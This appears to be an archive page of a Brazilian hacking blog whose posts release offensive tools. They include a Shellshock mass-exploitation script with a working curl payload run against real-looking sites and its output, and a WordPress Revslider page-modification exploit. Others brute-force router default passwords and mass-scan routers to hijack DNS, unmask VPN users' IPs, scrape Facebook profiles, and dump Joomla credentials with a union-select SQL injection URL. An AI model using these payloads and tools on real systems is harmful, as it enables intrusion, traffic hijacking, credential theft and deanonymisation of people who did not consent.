Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador script. Mostrar todas as postagens
Mostrando postagens com marcador script. Mostrar todas as postagens

sexta-feira, 1 de maio de 2015

Tool Xpl SHELLSHOCK Ch3ck - Mass exploitation

The tool inject a malicious user agent that allows exploring the vulnerabildiade sheellshock running server-side commands.


  # SCRIPT by:     [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
  # EXPLOIT NAME:  Xpl SHELLSHOCK Ch3ck Tool - (MASS)/ INURL BRASIL
  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil

- DESCRIPTION - VULNERABILITY(SHELLSHOCK)

- CVE-2014-6271, CVE-2014-6277,
- CVE-2014-6278, CVE-2014-7169,
- CVE-2014-7186, CVE-2014-7187
Shellshock aka Bashdoor, is a security hole in the Bash shell on GNU's Unix-based systems, which was released on September 24, 2014.
Many servers on the Internet such as web servers use Bash to process commands, allowing an attacker to exploit the vulnerability Bash to execute arbitrary commands. This could allow an attacker to gain unauthorized access to a computer system.

- DESCRIPTION - TOOL
The tool inject a malicious user agent that allows exploring the vulnerability
sheelshock running server-side commands.

- DEPENDENCIES:
sudo apt-get install php5 php5-cli php5-curl

- EXECUTE:
     -t : SET TARGET.
  -f : SET FILE TARGETS.
  -c : SET COMMAND.
  -w : SET UPLOAD SHELL PHP.
  Execute:
  php xplSHELLSHOCK.php -t target -c command
  php xplSHELLSHOCK.php -f targets.txt -c command
  SHELL UPLOAD: php xplSHELLSHOCK.php -t target -c command -w
  OUTPUT VULN: SHELLSHOCK_vull.txt

- EXEMPLES:
php xpl.php -t 'http://www.xxxcamnpalxxx.com.br/cgi-bin/login.sh' -c pwd
CMD:
Linux serv 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686 Intel(R) Xeon(R) CPU E5504  @ 2.00GHz GenuineIntel GNU/Linux
uid=1000(icone) gid=100(users) groups=100(users)
/ico/camnpal/cgi-bin
END_CMD:


php xpl.php -t 'http://www.xxxbnmxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis' -c pwd
CMD:
Linux sitiobnm 2.6.37BNM #26 SMP Tue Jan 25 19:22:26 ART 2011 x86_64 GNU/Linux
uid=1005(webmaster) gid=1003(webmaster) groups=1003(webmaster)
/mnt/volume1/sitio/data/catalogos/cgi-bin
END_CMD:
OUTPUT:
- EXEMPLES: php xpl.php -t 'http://www.xxxcamnpalxxx.com.br/cgi-bin/login.sh' -c pwd CMD: Linux serv 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686 Intel(R) Xeon(R) CPU E5504  @ 2.00GHz GenuineIntel GNU/Linux uid=1000(icone) gid=100(users) groups=100(users) /ico/camnpal/cgi-bin END_CMD:   php xpl.php -t 'http://www.xxxbnmxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis' -c pwd CMD: Linux sitiobnm 2.6.37BNM #26 SMP Tue Jan 25 19:22:26 ART 2011 x86_64 GNU/Linux uid=1005(webmaster) gid=1003(webmaster) groups=1003(webmaster) /mnt/volume1/sitio/data/catalogos/cgi-bin END_CMD: OUTPUT:


- USE CURL MANUAL EXPLOIT::
curl -v --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"' 'http://www.xxxxxbnmxxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis'
OUTPUT:
- USE CURL MANUAL EXPLOIT:: curl -v --user-agent '() { foo;};echo; /bin/bash -c "expr 299663299665 / 3; echo CMD:;id; echo END_CMD:;"' 'http://www.xxxxxbnmxxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis'


- EXPLOIT MASS USE SCANNER INURLBR
./inurlbr.php --dork 'inurl:"/cgi-bin/login.sh"' -s out.txt -q 1,6 --command-vul "php xpl.php -t '_TARGETFULL_' -c pwd"

More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR

- ACESSO AO EXPLOIT:
Tool Xpl SHELLSHOCK Ch3ck
https://github.com/googleinurl/Xpl-SHELLSHOCK-Ch3ck



REFERENCES:
http://pt.wikipedia.org/wiki/Shellshock
http://curl.haxx.se/docs/manpage.html
https://shellshocker.net/

terça-feira, 24 de março de 2015

WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL

WORDPRESS EXPLOIT Revslider

Exploit que possibilita modificação do arquivo HTML da pagina, o plugin Revslider da plataforma CMS Wordpress  é bem conhecido por outras brechas de segurança, pois bem dessa vez é possível fazer uma pequena modificação do arquivo get_captions_css.

Exploit que possibilita modificação do arquivo HTML da pagina, o plugin Revslider da plataforma CMS Wordpress  é bem conhecido por outras brechas de segurança, pois bem dessa vez é possível fazer uma pequena modificação do arquivo get_captions_css. 

Enviando a requisição:
Via post com seguintes campos:
array(
"action" => "revslider_ajax_action",
"client_action" => "update_captions_css",
 "data" => "_YOU_HTML_ADD_"
 );

Dentro no campo data é onde enviamos nosso HTML modificado.
Nossa array post com os dados já previamente preechidos são enviados para seguinte
URL - POST: http://{target}/wp-admin/admin-ajax.php

Com todo processo terminado podemos verifica se foi modificado o HTML do alvo.
URL - FINAL:  http://{target}/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css 

USANDO EXPLOIT : 
DOWNLOAD:  http://pastebin.com/a2LHiD7U

EXECUTE:
    -t : SET TARGET.
    -f : SET FILE TARGETS.
    -p : SET PROXY
    Execute:
         php exploit.php -t target
         php exploit.php -f targets
         php exploit.php -t target -p 'http://localhost:9090'



OUTPUT COMAND -t:
OUTPUT: WORDPRESS Revslider Exploit (0DAY) / INURL - BRASIL

OUTPUT COMAND -f targets.txt:
OUTPUT COMAND -f targets.txt:


Usando em massa com SCANNER INURLBR:
DOWNLOAD:
https://github.com/googleinurl/SCANNER-INURLBR 

COMANDO:
./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt  -q 1,6  --comand-all 'php inurl_revslider.php -t _TARGET_'

OUTPUT:
OUTPUT: ./inurlbr.php --dork 'inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"' -s vull.txt  -q 1,6  --comand-all 'php inurl_revslider.php -t _TARGET_'

terça-feira, 17 de março de 2015

[DSLink 260E] - Defaut Passwords DNS Change

xplDSLink260E SCANNER

Ah um tempo atrás eu estava pesquisando alguns router(roteadores) vulneráveis a diversos tipos de ataques mas comuns, Durante a pesquisa encontrei 10 routers com senhas padrões em apenas um range de ip do modelo DSLink 260E, Todos com senhas padrões e com (forms) para alteração de DNS! Nos 10 routers conseguir realizar a alteração de DNS.

Eae galera tudo certo ?

Ah um tempo atrás eu estava pesquisando alguns router(roteadores) vulneráveis a diversos tipos de ataques mas comuns, Durante a pesquisa encontrei 10 routers com senhas padrões em apenas um range de ip do modelo DSLink 260E, Todos com senhas padrões e com (forms) para alteração de DNS, Em 10 routers obtive sucesso realizando alteração de DNS.

Então desenvolvi um mini scanner em python, que realiza um pequeno bruteforce com usuários e senhas padrões definidos dentro do código e depois de encontrado usuário e senha ele envia um request get realizando a alteração dos DNS.

Então montei um mini scanner em python, que realiza um pequeno bruteforce com usuários e senhas padrões definidos dentro do código e depois de encontrado usuário e senha ele envia um request get realizando a alteração dos DNS.

Execução: 
  • [email protected]:~/Desktop/codes# python xpl.py <IP>
  • [Aqui você será definido o ip do roteador]
  Retorno:


[ + ] DNS changed sucess in: 127.0.0.1 | user@password
[ DEMO ] 

SCRIPT DOWNLOAD :
https://github.com/jh00nbr/xplDSLink260E/blob/master/xpl.py

 

sexta-feira, 13 de fevereiro de 2015

Scanner RouterhunterBR 1.0 - explorando roteadores

 
Hoje iremos apresentar o RouterhuntertBR 1.0!

Mas oque é o RouterhunterBR? Como funciona? Qual finalidade ?

  Inicialmente o RouterhunterBR foi desenvolvido para explorar vulnerabilidades DNSChanger em routers caseiros que possuem falhas em paginas  sem autenticação dentro do roteador, 
Assim modificando o DNS padrão dentro do roteador.

 Uma vez modificado o DNS padrão para o DNS Malicioso, você pode realizar o redirecionamento do trafego para paginas maliciosas.

  Como funciona o DNS?
O DNS (Domain Name System) é o serviço responsável por traduzir nomes em IP’s e vice-versa, isto é, quando escrevemos www.xxware.com, há uma consulta ao DNS para saber qual o IP correspondente.

O que é o DNSChanger?
O DNSChanger é um trojan capaz de redirecionar pedidos do utilizador para sites ilícitos. Na prática, este malware tem a capacidade de alterar as configurações do DNS da nossa máquina redirecionando o utilizador para sites com fins maliciosos. Imagine por exemplo que o seu sistema está infectado por este malware, aquilo que poderá acontecer é que o utilizador ao aceder a um determinado site (ex. facebook.com) poderá ser reencaminhado para um site não solicitado e potencialmente ilegal.


O RouterhunterBR funciona da seguinte maneira, ele roda pela internet procurando por faixas de ips pre-definidas ou aleatórias com intuito de explorar vulnerabilidade DNSChanger em routers(roteadores) caseiros. Por inicio está e a principal função do RouterHunter!, mas em breve novas atualizações estão por vir.

O RouterhunterBR funciona da seguinte maneira, ele roda pela internet procurando por faixas de ips pre-definidas ou aleatórias com intuito de explorar vulnerabilidade DNSChanger em routers(roteadores) caseiros. Por inicio está e a principal função do RouterHunter!, mas em breve novas atualizações estão por vir


* Description:*
  The script explores two vulnerabilities in routers
  01 - Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit
  reference: http://www.exploit-db.com/exploits/35995/

  02 - D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit
  reference: http://www.exploit-db.com/exploits/35917/

  03 - LG DVR LE6016D / Unauthenticated users/passwords disclosure exploitit
  reference: http://www.exploit-db.com/exploits/36014/

  ----------------------------------------------------------

 * Execute*
  Simple search:   php RouterHunterBR.php --range '177.100.255.1-20' -- dns1  8.8.8.8 --dns2 8.8.4.4 --output result.txt

Set IPS random:
php RouterHunterBR.php --rand --limit-ip 200 --dns1  8.8.8.8 --dns2 8.8.4.4 --output result.txt

Set source file:
php RouterHunterBR.php --file ips.txt --dns1  8.8.8.8 --dns2 8.8.4.4 --output result.txt

Set proxy:      
php RouterHunterBR.php --range '177.100.255.1-20' --dns1  8.8.8.8 --dns2 8.8.4.4 --output result.txt --proxy 'localhost:8118'
  Proxy format:


  ----------------------------------------------------------

 * Dependencies*
sudo apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl033

VÍDEO

segunda-feira, 2 de fevereiro de 2015

WebRTC - JavaScript bypass TOR/VPN - windows

Usuários de VPN estão enfrentando uma falha de segurança enorme, em que  sites podem ter acesso facilmente a seus endereços de IP através WebRTC. A vulnerabilidade é limitado a navegadores de suporte, Firefox e Chrome, e parece afetar apenas os usuários do Windows. Felizmente a falha de segurança é relativamente fácil de corrigir.  WebRTC é uma API em desenvolvimento elaborada pela World Wide Web Consortium (W3C) para permitir aos navegadores executar aplicações de chamada telefônica, video chat e compartilhamento P2P sem a necessidade de plugins.   Revelações feitas pelo boxedThe Snowden deixaram claro que a privacidade on-line não é, certamente, um dado adquirido.  Apenas alguns dias atrás, nós aprendemos que o Governo canadense rastreados visitantes de dezenas de sites de compartilhamento de arquivo populares.  Como essas histórias fazem manchetes em tem todo o interesse mundial em serviços de anonimato, tais como VPNs tem aumentado, como até mesmo os usuários regulares da Internet não gosta da idéia de ser espionados.  Infelizmente, até mesmo os melhores serviços de VPN não podem garantir que ser 100% de segurança. Nesta semana, uma muito preocupante falha de segurança revelou que é fácil de ver os verdadeiros endereços IP de muitos usuários de VPN através de um recurso WebRTC.  Com algumas linhas de código, sites podem fazer solicitações para atordoar os servidores e log VPN IP-address dos usuários e o "hidden" home IP-address IP, bem como endereços de rede local.  A vulnerabilidade afeta navegadores WebRTC de suporte, Firefox e Chrome e parece estar limitada a máquinas Windows.  A demo publicada no GitHub pelo desenvolvedor Daniel Roesler permite que as pessoas para verificar se eles são afetados pela falha de segurança.

Usuários de VPN estão enfrentando uma falha de segurança enorme, em que  sites podem ter acesso facilmente a seus endereços de IP através WebRTC.
A vulnerabilidade é limitado a navegadores de suporte, Firefox e Chrome, e parece afetar apenas os usuários do Windows. Felizmente a falha de segurança é relativamente fácil de corrigir.

WebRTC é uma API em desenvolvimento elaborada pela World Wide Web Consortium (W3C) para permitir aos navegadores executar aplicações de chamada telefônica, video chat e compartilhamento P2P sem a necessidade de plugins.


Revelações feitas pelo boxedThe Snowden deixaram claro que a privacidade on-line não é, certamente, um dado adquirido.

Apenas alguns dias atrás, nós aprendemos que o Governo canadense rastreados visitantes de dezenas de sites de compartilhamento de arquivo populares.

Como essas histórias fazem manchetes em tem todo o interesse mundial em serviços de anonimato, tais como VPNs tem aumentado, como até mesmo os usuários regulares da Internet não gosta da idéia de ser espionados.

Infelizmente, até mesmo os melhores serviços de VPN não podem garantir que ser 100% de segurança. Nesta semana, uma muito preocupante falha de segurança revelou que é fácil de ver os verdadeiros endereços IP de muitos usuários de VPN através de um recurso WebRTC.

Com algumas linhas de código, sites podem fazer solicitações para atordoar os servidores e log VPN IP-address dos usuários e o "hidden" home IP-address IP, bem como endereços de rede local.

A vulnerabilidade afeta navegadores WebRTC de suporte, Firefox e Chrome e parece estar limitada a máquinas Windows.

A demo publicada no GitHub pelo desenvolvedor Daniel Roesler permite que as pessoas para verificar se eles são afetados pela falha de segurança.

DEMO:


Usuários de VPN estão enfrentando uma falha de segurança enorme, em que  sites podem ter acesso facilmente a seus endereços de IP através WebRTC.  A vulnerabilidade é limitado a navegadores de suporte, Firefox e Chrome, e parece afetar apenas os usuários do Windows. Felizmente a falha de segurança é relativamente fácil de corrigir.  Revelações feitas pelo boxedThe Snowden deixaram claro que a privacidade on-line não é, certamente, um dado adquirido.  Apenas alguns dias atrás, nós aprendemos que o Governo canadense rastreados visitantes de dezenas de sites de compartilhamento de arquivo populares.  Como essas histórias fazem manchetes em tem todo o interesse mundial em serviços de anonimato, tais como VPNs tem aumentado, como até mesmo os usuários regulares da Internet não gosta da idéia de ser espionados.  Infelizmente, até mesmo os melhores serviços de VPN não podem garantir que ser 100% de segurança. Nesta semana, uma muito preocupante falha de segurança revelou que é fácil de ver os verdadeiros endereços IP de muitos usuários de VPN através de um recurso WebRTC.  Com algumas linhas de código, sites podem fazer solicitações para atordoar os servidores e log VPN IP-address dos usuários e o "hidden" home IP-address IP, bem como endereços de rede local.  A vulnerabilidade afeta navegadores WebRTC de suporte, Firefox e Chrome e parece estar limitada a máquinas Windows.  A demo publicada no GitHub pelo desenvolvedor Daniel Roesler permite que as pessoas para verificar se eles são afetados pela falha de segurança.

TESTE-DEMO: https://diafygi.github.io/webrtc-ips/

A demo afirma que plugins do navegador não podem bloquear a vulnerabilidade, mas felizmente isso não é inteiramente verdade. Existem várias soluções fáceis disponíveis para corrigir a falha de segurança.

Usuários do Chrome podem instalar a extensão bloco WebRTC ou ScriptSafe, que tanto supostamente pode bloquear a vulnerabilidade.
https://chrome.google.com/webstore/detail/webrtc-block/nphkkbaidamjmhfanlpblblcadhfbkdm

Usuários do Firefox deve ser capaz de bloquear o pedido com o addon NoScript. Alternativamente, eles podem digitar "about: config" na barra de endereços e definir a configuração "media.peerconnection.enabled" para false.

Exemplo-firefox:

Usuários do Firefox deve ser capaz de bloquear o pedido com o addon NoScript. Alternativamente, eles podem digitar "about: config" na barra de endereços e definir a configuração "media.peerconnection.enabled" para false.  Exemplo-firefox:



Outras maneiras de fugir da falha.

"Talvez a melhor maneira de ser protegido de WebRTC e vulnerabilidades semelhantes é executar o túnel VPN diretamente no roteador. Isso permite que o usuário seja conectado a uma VPN diretamente via Wi-Fi, não deixando nenhuma possibilidade de um script desonestos ignorando um túnel VPN software e encontrar a própria IP real ", diz  Ben Van der Pelt tells - TorGuard’s.

"Durante testes usuários do Windows que foram conectados por meio de um roteador VPN não eram vulneráveis a vazamentos WebRTC IP mesmo sem quaisquer correções do navegador".

Enquanto as correções acima são relatados para o trabalho, o vazamento é um lembrete de que o anonimato nunca deve ser tomada como garantida.

Como é frequentemente o caso com este tipo de vulnerabilidades, os usuários de VPN e proxy devem verificar regularmente se a sua conexão é segura. Isso também inclui o teste contra vazamentos de DNS e vulnerabilidades de proxy.

Update: O FreeBSD também parece estar afetado pela vulnerabilidade.

Não só Google Chrome,Mozilla Firefox que usam suporte API WebRTC, mas também Opera e Maxthon Cloud Browser podem ter sidos afetados.

Com modificações fizemos nosso scripts de exploração que alem de capturar o ip já faz o trapalho de salvar em um outpufile.


ARQUIVO-1 EXPLORAÇÃO:
http://pastebin.com/2u55h7Dj

ARQUIVO-2 SALVAR IPS:
Nome arquivo inurlbrasil.php
http://pastebin.com/Wbw9GhPc

Ao acessar o arquivo exploração-1, o mesmo passa via request get os ips captados do cliente para o arquivo-2(inurlbrasil.php) , assim já armazenando o mesmo no arquivo local server detentor do script.

FILE OUTPUT:
Ao acessar o arquivo exploração-1, o mesmo passa via request get os ips captados do cliente para o arquivo-2(inurlbrasil.php) , assim já armazenando o mesmo no arquivo local server detentor do script.


Fonte referencia:
http://pt.wikipedia.org/wiki/WebRTC
https://www.reddit.com/r/VPN/comments/2tva1o/websites_can_now_use_webrtc_to_determine_your
https://torguard.net/blog/browser-security-vulnerability-may-allow-real-ip-leak/
http://torrentfreak.com/huge-security-flaw-leaks-vpn-users-real-ip-addresses-150130/
https://twitter.com/jeremiahg/status/561892669279191040

domingo, 28 de dezembro de 2014

TUTORIAL Capturing data facebook

TUTORIAL Capturing data facebook

Uma forma simples de pegar dados de usuários facebook
O perfil do alvo deve está parcialmente aberto ou você deve ser amigo do mesmo.
Nem todo perfil temo exito na extração.
--------------------------------------------------------------------------------------------
[TODA INFORMAÇÃO DEVE SER LIVRE]
[جميع المعلومات يجب أن تكون خالية]
[ALL INFORMATION MUST BE FREE]
/*
*/
--------------------------------------------------------------------------------------------

[PROFILE PHOTO]::
https://graph.facebook.com/{USER_OR_ID_USER}/picture?width=2000&height=2000
EX: https://graph.facebook.com/zuck/picture?width=2000&height=2000

[BASIC DATA]::
https://graph.facebook.com/{USER_OR_ID_USER}
 EX: https://graph.facebook.com/zuck
--------------------------------------------------------------------------------------------

[S C R I P T] = > INURL BRASIL / API Facebook Data Mining Utility :: http://packetstormsecurity.com/files/129918/Facebook-Data-Mining-Utility.html

 Description: The script captures uid, username, name, first_name, middle_name, last_name, fri, locale, pic_small_with_logo, pic_big_with_logo, pic_square_with_logo, pic_with_logo

 How to use php face.php {USER_OR_ID_USER}
 http://s21.postimg.org/re018qbvp/Untitled_4.jpg

REF:: http://pastebin.com/PMWXLmyp
--------------------------------------------------------------------------------------------

segunda-feira, 28 de julho de 2014

INURLBR API face V1.0 - PESQUISA DE DADOS PUBLICOS FACEBOOK

Script feito em php que pesquisa dados públicos através de requests do próprio facebook.
Temos acesso ao seguinte resultado:

     ID::
    USERNAME::
    NOME::
    PRIMEIRO NOME::
    SOBRENOME::
    SEXO::
    LOCAL::
    FOTO LOGO PEQUENA::
    FOTO LOGO GRANDE::
    FOTO LOGO::
    FOTO::


Exemplo de uso:

[+] Pesquisa dados facebook, Ex: php face.php zuck

[ RETORNO ]
INURLBR API face V1.0 - PESQUISA DE DADOS PUBLICOS FACEBOOK

Baixar:: http://pastebin.com/TdfymVXr

quinta-feira, 24 de julho de 2014

Introdução SCANNER INURLBR V1.0

Introdução SCANNER INURLBR V1.0
[+]  Introdução  
*Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a validação personalizada interna para cada alvo/url encontrada.
*Captura de emails.
*Execução de comandos direto no console para cada possível vulnerável. *Execução de comandos direto no console para todo alvo encontrado.  *Analise de urls com base em arquivo txt, sem necessidade de usar motor de busca. *Definição de proxy. *Opção proxy TOR randômico.
_____
(_____)
(() ())
\   /
\ /
/=\
[___]
[INURLBR V1.0]
------------------------------------------------------------------------------


Explicando comando -q
Que é responsável por definir qual motor de busca vai efetuar os trabalhos.

-q tem acesso a 12 motores de busca.
1   - www.google.com.br
2   - www.bing.com
3   - br.search.yahoo.com
4   - www.ask.com
5   - search.hao123.com.br
6   - ajax.googleapis.com
7   - search.lycos.com
8   - busca.uol.com.br
9   - us.yhs4.search.yahoo.com
10  - pesquisa.sapo.pt
11  - www.dmoz.org
12  - www.gigablast.com
all  - todos motores de busca
Default:    1
Exemplo: -q {op}
Uso:
         -q 1 
         -q 5
Múltiplos motores  -q 1,2,5,6,11
Todos motores        -q all
Ex:
-----------------------------------------------------------------------------------------------------------------------------------
./inurlbr.php --dork 'site:br php?id=' -q 1,6 -s arquivo.txt --exploit-get "'´0x27"
-----------------------------------------------------------------------------------------------------------------------------------
0xVÍDEO[1]:

0xVÍDEO[2] - PARROT OS:
0xVÍDEO[2] - Usando Exploit joomla

  
0xDetalhes:

 * joomla component com_tag (tag_id) SQL Injection Vulnerability
 * [Joomla componente]
 * com_tag (tag_id) Vulnerável a SQL-injection

0xCOMANDOS INURLBR:

./inurlbr.php --dork 'inurl:option=com_tag' -q 1,6 -s joomla.txt -t 3 --exploit-get '/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component' -a 'Edit Tags'


0xDOWNLOAD SCRIPT
https://github.com/googleinurl/SCANNER-INURLBR

Ref:
http://blog.inurl.com.br/2014/07/joomla-component-comtag-tagid-sql.html

segunda-feira, 21 de julho de 2014

Testando novo Scanner inurl beta

BETA - Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a captura de emails & validação personalizada interna para cada alvo/url encontrada.
#ZEND FRAMEWORK,#ERROS MYSQL,#ERROS MICROSOFT,#ERROS JDBC,#ERROS ORACLE,#ERROS POSTGRESQL,#ERROS PHP,#ERROS ASP,#ERROS LUA,#ERROS INDEFINIDOS

                                    _____
                                   (_____)  
                                   (() ()) 
                                    \   /   
                                     \ / 
                                     /=\
                                    [___]

#####################################
#GRUPO GOOGLEINURL BRASIL - PESQUISA AVANÇADA.
#SCRIPT NAME: INURLBR
#AUTOR:    Cleiton Pinheiro
#Nick:     Googleinurl
#Blog:     http://blog.inurl.com.br
#twitter: /@googleinurl
#facebook: /InurlBrasil
#Versão:  1.0
#-------------------------------------------------------------------------------
#PHP Version         5.4.7
#php5-curl           LIB
#php5-cli            LIB 
#cURL support        enabled
#cURL Information    7.24.0
#Apache              2.4
#allow_url_fopen     On
#permission          Reading & Writing
#User                root privilege, or is in the sudoers group
#Operating system    LINUX
#Proxy random        TOR               
#####################################

[YOUTUBE]
https://www.youtube.com/watch?v=_zpYVreCR_w

Testando novo Scanner inurl 1.0 beta

Testando novo Scanner inurl 1.0 beta


http://pastebin.com/Tb0Qp0qY

sexta-feira, 18 de julho de 2014

DecrypterMD5 API

[ INURLBR API DecrypterMD5  ]
 bdbbe98d4714585c4a2eae76cd0e3cae
xNeither war between hackers, nor peace for the system.
----------------------------------------------------------------------------------
[+] Pesquisa por arquivo, Ex: php md5.php --file filemd5.txt
[+] Pesquisa simples, Ex: php md5.php --md5 21232f297a57a5a743894a0e4a801fc3
                                    _____
                                   (_____)  
                                   (() ()) 
                                    \   /   
                                     \ / 
                                     /=\
                                    [___]



INURLBR API DecriptMD5
----------------------------------------------------------------------------------
INURLBR API DecriptMD5  RESULTADOS

Proxy camuflagem envio de request.
- Exemplo: --proxy {proxy:porta}
- Uso:        --proxy localhost:8118
                  --proxy socks5://[email protected]:9050
                  --proxy http://admin:[email protected]:8080

O uso da rede TOR no script garante que você não seja bloqueado em requisições massivas.

Baixar:: http://pastebin.com/grYTVJKF

segunda-feira, 23 de junho de 2014

Ferramenta Simple SQLi Dumper v5.1 - Tool

   Simple SQLi Dumper v5.1 - Tool 

   Simple SQLi Dumper v5.1 - Tool
Procura bugs,erros ou vulnerabilidades em aplicações que usem MySQL database.
Funções:
  1. SQL Injection,
  2. Operation System Function,
  3. Dump Database,
  4. Extract Database Schema,
  5. Search Columns Name,
  6. Read File (read only),
  7. Create File (read only),
  8. Brute Table & Column

Baixar:http://pastebin.com/ZGk5DKYa

terça-feira, 10 de junho de 2014

netool.sh V3.4 [ r00tsect0r module ]

netool.sh V3.4 
netool.sh é um script em bash para automatizar frameworks como Nmap, redes de deriva, sslstrip, Metasploit e Ettercap MITM ataques. esse script faz com que seja fácil, tarefas como SNIFFING tráfego TCP / UDP, ataques ManInTheMiddle, SSLsniff, falsificação de DNS, o outro módulos disponíveis são: recuperar metadados do site alvo, ataques DoS dentro da rede externa / local,também usa macchanger para chamariz scans, usa o nmap para procurar uma porta especificada aberto no externo / lan local, mudança / ver o seu endereço mac, mudar o meu PC hostname, também pode executar TCP / UDP pacotes manipulação usando etter.filters, também como a habilidade de capturar imagens de navegação na web-browser na máquina de destino sob ataque MITM e realiza uma varredura vuln ao web-site-alvo usando websecurify firefox-addon, também usos [msfpayload + + msfencode msfcli] para ter o controle remoto da máquina de destino, também veio com [root3.rb] meterpreter ruby ​​script de auxiliar, e um módulo para instalar / editar o script meterpreter e atualizar o banco de dados Metasploit automática, busca de alvos de geolocalização, ou use [webcrawler.py] módulo para procurar páginas de login de administrador, directorys site, webshells.php plantada no site, scanner vulns upload de arquivo comum [LFI] e procurar XSS sites vuln usando idiotas google, também usa um módulo para automatizado alguns ataques mais MITM (dns-paródia + metasploit + phishing, e uma colecção de (Metasploit) exploits automatizados ...

netool.sh é um script em bash para automatizar frameworks como Nmap, redes de deriva, sslstrip, Metasploit e Ettercap MITM ataques. esse script faz com que seja fácil, tarefas como SNIFFING tráfego TCP / UDP, ataques ManInTheMiddle, SSLsniff, falsificação de DNS, o outro módulos disponíveis são:
recuperar metadados do site alvo, ataques DoS dentro da rede externa / local,também usa macchanger para chamariz scans, usa o nmap para procurar uma porta especificada aberto no externo / lan local, mudança / ver o seu endereço mac, mudar o meu PC hostname, também pode
executar TCP / UDP pacotes manipulação usando etter.filters, também como a habilidade de capturar imagens de navegação na web-browser na máquina de destino sob ataque MITM e realiza uma varredura vuln ao web-site-alvo usando websecurify firefox-addon, também usos [msfpayload + + msfencode msfcli] para ter o controle remoto da máquina de destino, também
veio com [root3.rb] meterpreter ruby ​​script de auxiliar, e um módulo para instalar / editar o script meterpreter e atualizar o banco de dados Metasploit automática, busca de alvos de geolocalização, ou use [webcrawler.py] módulo para procurar páginas de login de administrador,
directorys site, webshells.php plantada no site, scanner vulns upload de arquivo comum [LFI] e procurar XSS sites vuln usando idiotas google, também usa um módulo para automatizado alguns ataques mais MITM (dns-paródia + metasploit + phishing, e uma colecção de
(Metasploit) exploits automatizados ...

Dependências
  1. Nmap
  2. Ettercap
  3. Macchanger
  4. Metasploit
  5. Driftnet
  6. Apache2
  7. Sslstrip
  8. Python-beautifulsoup

Neste vídeo tutorial, vamos ver o funcionamento acompanhamento módulos:
  1. Backdoor PDF (Adobe Reader no Windows XP SP3)
  2. FakeUpdate (windows universal)
  3. java.jar phishing (OSX maçã, Linux, Windows, BSD, Solaris com java em execução)
  4. java_applet attacj "clonar um site e injetar um Iframe que aponta para a nossa aplicação" (sistemas afetados são: Apple OSX, Linux, Windows, BSD, Solaris)
  5. Ataque RDP D0S (denial-of-service Agains um host de destino em execução RDP proto)
ChangeLog:
----------------------------------------­---------------------------------------------------------------­-----------------------
Interface de usuário renovada
'clear script output'
'linux hashdump.rb added'
'PDF backdoor added'

Phishing modules improved
'External IP addr display'
'post-exploitation modules added'
----------------------------------------­---------------------------------------------------------------­-----------------------



Página do projeto
http://sourceforge.net/projects/netoolsh/?source=directory

WIKI:
http://sourceforge.net/p/netoolsh/wiki/netool.sh%20script%20project/  



sexta-feira, 9 de maio de 2014

Procurando warning de erro usando scanner inurl.

Procurar avisos warning mysql dentro de sites .br excluindo resultados não interessantes como forum's  e tutoriais.

Procurar avisos warning mysql dentro de sites .br excluindo resultados não interessantes como forum's  e tutoriais.

DORK: site:br intext:"warning: mysql_fetch_array();" -forum -vivaolinux -tutorial -Fórum

- Usando o scanner INURL -

php botConsole.php --host='www.google.com.br' --dork='site:br intext:"warning: mysql_fetch_array();" -forum -vivaolinux -tutorial -Fórum' --arquivo='resultado.txt' --tipoerro='2' --exploit='' --achar='Warning'


--host='define por qual host do google vai sair a busca, no caso é o .com.br, mas pode ser qualquer outro.
Para ver a lista de host do google digite 'php botConsole.php hosts'.'

--dork='define a dork que vai efetuar sua busca'

--arquivo='define o arquivo de saída onda vai ser salvo seu resultado'

--tipoerro=' 2 define o tipo de busca, tipo dois sanguifica que o script vai validar se é vull ou não, caso ele achar a string passada no comando --achar, se tal informação for encontrada dentro do alvo o site é possivelmente vul'

--exploit='define o que vai ser concatenado a cada url para o script ser executado, Ex: se você deseja executar um sql-exploit no final de cada url, e o script procurar por determinado erro ou msg ,nesse exemplo está vazio pois não tinha necessidade de exploitar os alvos, pois os mesmos já carregavam o erros sql.'

--achar='define o que procurar dentro de cada alvo, ou seja código fonte.
neste exemplo estavamos procurando avisos de do mysql Warning que em html ficaria Warning'

Procurar avisos warning mysql dentro de sites .br excluindo resultados não interessantes como forum's  e tutoriais.



Mais informações digite php botConsole.php ajuda

[ BAIXAR: http://pastebin.com/TzijC99y  ] 

RESULTADO:

SCANNER INURLBR 1.0 - [ blog.inurl.com.br ] /DATA:09/05/2014 10:14:52 
